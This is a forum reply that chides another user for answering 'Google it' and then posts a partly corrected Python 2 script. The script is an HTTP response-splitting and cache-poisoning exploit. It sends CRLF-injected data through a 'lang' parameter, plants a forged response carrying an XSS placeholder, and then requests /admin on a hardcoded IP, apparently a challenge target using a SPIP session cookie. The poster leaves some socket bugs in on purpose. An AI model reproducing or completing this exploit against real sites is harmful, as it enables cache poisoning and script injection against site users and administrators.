ThePH30N1X: Your response is equal to "I don't know what I'm talking about but Google is your friend."
Both unproductive and showing how little you probably know about the subject.
This isn't high school. Here when we reply to people it is conducive to a productive environment.
Almost never will you see a legitimate user ask about something, only to see a response by another user who has been here a while, "Google it n00b."
Now back to the code itself:
You made several mistakes in the use of sockets, and in your syntax.
I won't give you the answer but I have done a bit to help you out.
Good luck.
#!/usr/bin/python
# coding: utf-8
import re, socket, sys, urllib
# create TCP stream
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
print '[!]Failed to create socket. Error code: ' + str(msg[0])
sys.exit();
print '[+] Created TCP socket.'
def encode(data):
return re.sub("\n", "\r\n", data.lstrip())
try:
server = s.connect()
server.connect(("188.165.33.26", 58002))
session = []
except:
print '[!] Unable to resolve.'
print '[!] Closing SOCK_STREAM and exiting.'
s.close();
sys.exit();
# Empty the cache
data = """
GET /admin HTTP/1.1
Cache-Control: no-cache
Cookie: spip_session=%s
""" % (session)
server.send(encode(data))
print '[+] Clearing the cache.'
print server.recv(4096)
# Injection reponse
xss = "VOTRE XSS"
code = """
en
Content-Length: 0
HTTP/1.1 200 OK
Content-Length: %d
%s
""" % (len(xss), xss)
data = """
GET /user/param?lang=%s HTTP/1.1
Cookie: spip_session=%s
""" % (urllib.quote(encode(code)), session)
server.send(encode(data))
print '[+] XSS injected.'
print server.recv(4096)
# Changing the page cache /admin
data = """
GET /admin HTTP/1.1
Cookie: spip_session=%s
""" % (session)
server.send(encode(data))
print '[+] Affichage de la page modifiee'
# receive data from STREAMing socket
print server.recv(4096)
# Close socket.
# This is important.
print '[+] Successful injection.'
print '[!] Closing TCP stream.'
s.close()
